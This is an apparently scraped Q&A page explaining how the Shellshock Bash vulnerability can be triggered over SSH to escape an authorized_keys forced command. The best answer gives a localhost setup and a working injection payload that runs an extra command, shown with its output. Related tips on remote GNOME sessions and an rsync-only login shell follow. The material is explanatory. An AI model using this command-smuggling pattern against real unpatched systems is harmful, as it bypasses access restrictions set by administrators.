Shellshock – How Can It Be Exploited Over SSH?

bashshellshockssh

Apparently, the shellshock Bash exploit CVE-2014-6271 can be exploited over the network via SSH. I can imagine how the exploit would work via Apache/CGI, but I cannot imagine how that would work over SSH?

Can somebody please provide an example how SSH would be exploited, and what harm could be done to the system?

CLARIFICATION

AFAIU, only an authenticated user can exploit this vulnerability via SSH. What use is this exploit for somebody, who has legitimate access to the system anyway? I mean, this exploit does not have privilege escalation (he cannot become root), so he can do no more than he could have done after simply logging in legitimately via SSH.

Best Answer

One example where this can be exploited is on servers with an authorized_keys forced command. When adding an entry to ~/.ssh/authorized_keys, you can prefix the line with command="foo" to force foo to be run any time that ssh public key is used. With this exploit, if the target user's shell is set to bash, they can take advantage of the exploit to run things other than the command that they are forced to.

This would probably make more sense in example, so here is an example:

sudo useradd -d /testuser -s /bin/bash testuser
sudo mkdir -p /testuser/.ssh
sudo sh -c "echo command=\\\"echo starting sleep; sleep 1\\\" $(cat ~/.ssh/id_rsa.pub) > /testuser/.ssh/authorized_keys"
sudo chown -R testuser /testuser

Here we set up a user testuser, that forces any ssh connections using your ssh key to run echo starting sleep; sleep 1.

We can test this with:

$ ssh testuser@localhost echo something else
starting sleep

Notice how our echo something else doesn't get run, but the starting sleep shows that the forced command did run.

Now lets show how this exploit can be used:

$ ssh testuser@localhost '() { :;}; echo MALICIOUS CODE'
MALICIOUS CODE
starting sleep

This works because sshd sets the SSH_ORIGINAL_COMMAND environment variable to the command passed. So even though sshd ran sleep, and not the command I told it to, because of the exploit, my code still gets run.

Related Solutions

Ssh – Launch a GNOME session from a remote terminal

Switch to a second terminal, for example tty2: CtrlAlt-F2, login and start a new X session on an available display:

xinit -- :1

Now ssh to the other machine, enabling X forwarding (or trusted X forwarding with -Y):

ssh -X user@machine

Once logged in, start a new gnome-session:

gnome-session

You can also pass gnome-session as a command to ssh.

Shell – What default shell to use for an SSH user limited to a single command

You can write that shell:

cat >/tmp/rsyncshell.c <<EOF
#include <unistd.h>
char *argv[] = (char *[]) {
        "/usr/bin/rsync", "--server", "--sender", 
        "-lHogDtpre.iLs", ".", "//home/dummyuser/data/" };
int main () { execv(argv[0], argv); }
EOF

Compile the new shell:

gcc -o /bin/rsyncshell /tmp/rsyncshell.c

then set the dummyuser interpreter to /bin/rsyncshell

CLARIFICATION

Best Answer

Related Solutions

Ssh – Launch a GNOME session from a remote terminal

Shell – What default shell to use for an SSH user limited to a single command

Related Question